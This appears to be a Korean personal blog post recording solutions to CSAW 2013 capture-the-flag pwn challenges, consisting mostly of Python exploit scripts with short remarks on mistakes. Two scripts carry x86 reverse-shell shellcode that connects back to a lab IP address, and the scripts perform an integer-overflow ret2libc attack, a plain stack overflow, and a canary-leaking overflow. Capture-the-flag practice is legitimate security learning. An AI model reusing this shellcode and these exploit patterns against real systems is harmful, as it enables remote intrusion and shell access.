아오 .. 엄청오래걸렷다 ... integer overflow 해서 RTL로 풀엇다 

+) ROP 다시 공부해야겟다 

+)PORT 넘버때매 꽤오래 헤맷는데 ㅡㅡ ; 알고보니까 htons() 에 hexa값으로 들어가있엇다 ㅡㅡ; 담부터는 이런실수 안해야지 

fil_chal

from socket import *
from struct import pack,unpack 
import time
import sys

p=lambda x:pack("<L",x)
up=lambda x:unpack("L",x)[0]

HOST="192.168.72.148"
PORT=34266

buf =  ""
buf += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
buf += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
buf += "\xa8\x48\x94\x68\x02\x00\x1e\x61\x89\xe1\xb0\x66\x50"
buf += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
buf += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
buf += "\x0b\xcd\x80"

free=0x0804b000
recv_addr=0xf772c4e0
pr_addr=0x80495d4

offset='' #relative addres

system_addr =0xf75fb1f0 #메모장으로 복붙햇더니 짤려버림 ㄷㄷ 

s=socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
#starthere
s.recv(0x2A2)
s.recv(9)

#sendis
s.recv(20)#IDraw_input()
s.send("csaw2013")

s.recv(20)#passwordraw_input()
s.send("S1mplePWD")

s.recv(100) #URL

s.recv(30) #invalidcredn...

s.send(str(0xFFFF))#integerOverFlow
    
print s.recv(4096)
time.sleep(1)

payload =""
payload +="\x90"*(0x41c+4) #ebp
payload += p(recv_address)
payload += p(pr_addr)
payload += p(4)
payload += p(free)
payload += p(len(buf))
payload += p(0)
payload += p(system_addr)

s.send(payload)
s.send(buf)
raw_input("finally I solved by symnoisy>>")

+) pwnable.kr dragon 뭐로풀어야될지는 알겟는데 아직 감이안오네 

소스가 주어진 문제였다고 한다.. IDA 로 분석해봣는데 따로 특별한것 또한 없엇다 바로 공격 시도 

exploit1

[source]

void handle(int newsock) {

int backdoor = 0;

char buffer[1016];

memset(buffer, 0, 1016);

send(newsock, "Welcome to CSAW CTF.", 21, 0);

recv(newsock, buffer, 1020, 0);

buffer[1015] = 0;

if ( backdoor ) {

fd = fopen("./key", "r");

fscanf(fd, "%s\n", buffer);

send(newsock, buffer, 512, 0);

}

close(newsock);

}

[attack]

root@symnoisy:~/csaw2013# cat go.py 
from socket import *
from struct import pack,unpack 

p=lambda x:pack("<l",x)
up=lambda x:unpack("<l",x)[0]

host = "192.168.72.148"
port = 31337 

attack = "A"*1020

s=socket()
s.connect((host,port))
print s.recv(1024)
s.send(attack)
print s.recv(1024)
s.close()

ctf 드디어 입문했다.. 풀었을때 쾌감이 워게임에 비해 굉장히 큰거같다 

exploit2

따로 설명할건 없을거같고 .. 같이 공부하고있는애가 잘 이해를 못해서 그림을 그렷엇는데 그걸 첨부하겟다

[exploit]

from socket import *
from struct import pack,unpack
import time

p=lambda x: pack("<l",x)
up=lambda x: unpack("<l",x)[0]

buffer=0x00000000

shell =  ""
shell += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
shell += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
shell += "\xa8\x48\x94\x68\x02\x00\x1e\x61\x89\xe1\xb0\x66\x50"
shell += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
shell += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
shell += "\x0b\xcd\x80"

HOST="192.168.72.148"
PORT=31338

s=socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
buffer=s.recv(4)
print"[*]Buffer:" +hex(up(buffer))
canary=s.recv(4)
print"[*]Canary:" +hex(up(canary))
s.recv(7777)

Payload =""
Payload += "\x90"*30
Payload += shell
Payload += "\x90"*(0x800-len(Payload))
Payload += canary
Payload += "\x90"*(0x80c-len(Payload))
Payload += "GOOD"
Payload += buffer
print "[*]I need Your Password! By Symnoisy"
s.send(Payload)

raw_input("\n Give me !!!!>")